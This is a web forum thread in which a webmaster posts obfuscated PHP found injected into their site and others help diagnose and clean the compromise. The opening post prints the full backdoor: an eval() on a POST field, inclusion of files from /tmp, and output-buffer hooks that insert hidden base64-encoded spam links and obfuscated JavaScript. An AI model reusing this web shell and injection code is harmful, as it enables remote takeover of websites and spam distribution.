I found this in my pages, it's really distressing: <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5CdXlpbmcgZmFrZSB2aWFncmEgaWYgeW91IGFyZSBsb29raW5nIGZvciA8QSBIUkVGPSdodHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4JyBUSVRMRT0nY2hlYXAgZ2VuZXJpYyB2aWFncmEnIFRBUkdFVD1fYmxhbms+YnV5IHZpYWdyYSBubyBwcmVzY3JpcHRpb248L0E+IDxCUiAvPgpWaWFncmEgRmFxIDxBIEhSRUY9J2h0dHA6Ly9mb3J1bS5seWNvcy5kZS9tZW1iZXIucGhwP3U9MjYyODInIFRJVExFPSdidXkgdmlhZ3JhIGNoZWFwJyBUQVJHRVQ9X2JsYW5rPmJ1eSB2aWFncmEgbm8gZG9jdG9yPC9BPlZpYWdyYSBoYXBweSBwaWxsIGxvb2tpbmcgdG8gY29udHJvbCB5b3VyIGVyZWN0aW9uPyBsZXZpdHJhIHZlcnNlcyB2aWFncmEgYW1hemluZyBlZmZlY3QgPEEgSFJFRj0naHR0cDovL2ZvcnVtcy52b2d1ZS5jb20uYXUvbWVtYmVyLnBocD91PTc1NTE2JyBUSVRMRT0nYnV5IHZpYWdyYSB0ZXN0Jz5idXkgdmlhZ3JhIG9ubGluZTwvQT5WaWFncmEgKHNpbGRlbmFmaWwpIGFwcHJvdmFsIGFyZSB5b3UgcmVhZHkgdG8gcmV2ZWFsIHRoZSBnZW5lcmljIGNpYWxpcyBwaWxscyBsZXZpdHJhIGdlbmVyaWMgdmlhZ3JhIGRpZCB5b3Uga25vdyB0aGF0IDxBIEhSRUY9J2h0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUnIFRJVExFPSdidXkgdmlhZ3JhIGhlcmUnPmJ1eSB2aWFncmEgbWFzdGVyY2FyZDwvQT4gCjxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD5pZih0eXBlb2YoeWFob29fY291bnRlcik9PXR5cGVvZigxKSl2YXIgcz0nJztlbHNlIHZhciBzPXVuZXNjYXBlKCdCeWl4b3Z6JTI2eXhpQzU1JTNEJTNDNDclM0M5NDclM0ElM0Q0NzYlM0U1aXY1REI1eWl4b3Z6RDYnKTtmb3IodmFyIGk9MTtpPHMubGVuZ3RoO2krKylkb2N1bWVudC53cml0ZShTdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdChpLTEpLXMuc3Vic3RyKHMubGVuZ3RoLTEsMSkpKTt2YXIgeWFob29fY291bnRlcj0xOzwvc2NyaXB0PjwvZGl2Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> PHP: This is on my main site, and when I try to take it out of the page, my host's editor says it cannot save. Please tell me what's going on, and how to fix it.
This is what is in the base64 decode <div style='position:absolute; left:-1000px; top:-1000px;'>Buying fake viagra if you are looking for <A HREF='http://www.answerbag.com/profile/?id=310168' TITLE='cheap generic viagra' TARGET=_blank>buy viagra no prescription</A> <BR /></div> etc, etc.
Download the index file (page that has that php code), remove the entire line of code you posted, and then re-upload the edited file. There is obviously some security issue with your site/host that needs to be addressed.
Agreed. Something's up, and I think it's probably some of my scripts, which will be removed asap. With dialup that will take forever. I found that I can get around it by copying the good code, deleting the file, and creating the file again. It's a pain though. Why do people do this? Just for fun?
If it is shared hosting, tell this to your host, get them to harden the security. If it is your own server, get a security company for eg seeksadmin etc to harden the security of your server. This should be due to some kind of SQL injection which is extremely common nowadays.
It sounds like you're on top of the situation that someone's injected this code and that the fix will be repairing the pages and fixing the security hole. That's weird. What editor is it? cPanel FileManager, or the host's own web builder or something like that? If it's a web builder, have you ever gotten that error before, with pages that hadn't been hacked? One web builder I know of used to have a weird "can't save" error that occurred when someone modified the source code and then looked at the page in WYSIWYG view before saving. If they saved the page while still in Code View, it saved ok. Check the file and folder permissions to make sure the hack didn't change them. (I sort of doubt you'll find them changed, but it's worth checking.) Note the timestamps on the hacked pages (before you fix them), and look in your access logs for who was doing what at that moment. It will help discover how they did it.
Ok, the ownership was changed. It was "wierdo:wierdo" but was changed to "httpd:httpd". Anyone know what this means? EDIT: NOW I'm getting somewhere. Yeah I cleaned up my sites, but I found an IP address in my logs that was kind of suspicious and it was within a hour before the attack. It was trying to access a folder (that unfortunately I have deleted so I can't check it) that I had created to try an upload script in. I visited that IP, and the website it led me to was infected with the same code in the page as mine was, and prompted me to download a file called "img.scr". Of course I denied it. My question is, is this site at fault or what? I'm posting the IP in question, but be extremely careful about visiting it, and make sure to disable auto-downloading before visiting, if you do. IP: 76.163.190.2 If anyone can help me catch this person, I would appreciate it!
A WhoIs search shows that that IP traces to a shared server with about 35 websites on it. The likely scenario is that one of those sites got hacked and was turned into a web crawler with the task of compromising still more sites. In other words, that site probably got hit the same way yours was. You could notify the web host that you think you were attacked from that IP, and they might even investigate, but the number of hacked sites in the world is so astronomical that the time might be better spent just hardening your own site against whatever type of attack this turns out to be, so the same one can't succeed. Look in your logs for all instances of that IP. Look especially for requests containing a query string: GET /yourpage.ext?This=TheQueryString and especially where the query string refers to a script on a remote site ("http://someothersite/path/safe.txt"). If you can find such requests in your log (and keep watching, because they'll probably keep trying), yourpage.ext in the above example will be the page they attacked, and is the first place to look for possible vulnerabilities in your scripts. If the attack method turns out to be Remote File Inclusion (RFI), there are .htaccess and php.ini configuration settings to prevent it.
76.163.190.2 - Whois Lookup Information OrgName: Ecommerce Corporation OrgID: ECOMM-5 Address: 247 Mitch Lane City: Hopkinsville StateProv: KY PostalCode: 42240 Country: US There you go
Yeah, I did that, but I guess I'm just going to drop it. I think it came through a upload script I had started trying to make but never did anything with it, and never deleted it. Anyways, a forum of mine got hacked on a completely different host, with a different (and really tough) password. I think it got through the host itself, but I can't tell more until they answer. I'm really having horrible luck lately...
Sometimes But looks like you got hit by someone looking to push themselves up in the SERPS by forcing backlinks. Someone trying to make a quick buck by hitting poorly setup servers. As aforementioned, contact your host and the attacking host and notify them of the compromise. It's possible that since this was a shared host, someone hit another website and was able to escalate their privileges thereby taking over all websites sharing the host. Sounds like a server issue, but if you really think it's from an old upload script then check your logs and see if that file was accessed.
I thought of this earlier today too. I'll do this. The folder was accessed, but in my rush to clean everything up, I deleted it. Now I wish I had backed it up so I could look at it and look for stuff I wasn't checking. I'll have to be more careful with my PHP from now on.
I too have been HAMMERED by some script that messed up ALL of my files on my shared host. If you look closer you may find that more than just your PHP files have been affected. All of my affected files have had their date stamp changed to 4/8/2008. Affected php files have this inserted into the bottom of them My html files have THIS stuck in them It is a total disaster. My web host has a "tough sh*t attitude" about the incident. Since it is a shared hosting server they say there is no way they can track down what happened. They clear their logs daily and only keep a backup up to a week. Unfortunately I noticed the issue too late. I'm not sure what to do to correct it. My thought would be find some script that would be able to delete the lines of bogus code since I am literally talking about thousands of affected files. Oh and yes, the script also changed the permissions on all of my files to 400. Any thoughts or ideas on how to address this would be welcome.
So, they can't help you because you're on a shared host? Sounds utterly absurd if you ask me. If I was running a shared host and a website was compromised by this kind of attack I would start checking to see if any other websites where affect by the same attack. I would recommend changing hosts to one with different logging policies. So even after you remove it, it comes back? I would check your crontabs to see if there is any event scheduled. Perhaps a script is set to execute daily to reinsert the PHP code. If this is the case locating any rogue scripts shouldn't be any problem. On the other hand, if the attackers compromised the entire server (something your host should take care of) then you really are in a pretty crappy position as there is relatively nothing you can do about it besides talking to your host.
Here are some ideas that should at least point you to some of the tools you have available: First off, you could delete the entire site (or ask the host to do it) and upload it fresh from a known-good copy. You should make sure you have a good complete copy of the site. This is because after you repair it the first time, it may take some time to figure out where the security hole was, and during that time it is likely to get hacked again. You don't want to repair thousands of files multiple times! If you don't have a good copy of the site, download the hacked version, fix it locally, and then re-upload the cleaned copy. To work on the server (either to fix the permissions or to remove the bad code from multiple files), you have tools available to you in Linux and PHP. It may require a lot of study time, but even with that time taken into account, the automated tools should still take less time than fixing each file manually. On a shared server, you probably don't have command line access to run Linux commands, but you may be able to create cron jobs containing the same commands that you would otherwise run from the Linux command line. You can also run PHP scripts using a cron job. So, for example, to fix the permissions, you can choose between a Linux method (chmod) or a PHP method (also chmod). To strip bad code out of files, you'd use a regular expressions search and replace method that can search multiple files with one command. You have a choice between Linux methods (I believe sed is the one to use for this) or PHP methods (such as ereg_replace, I think). ----- Alternatively, if you download the site to your computer and fix it there, you have Windows tools available. FrontPage, Expression Web, Dreamweaver, Visual C++ Express, and other programs have good regular expresions search capabilities.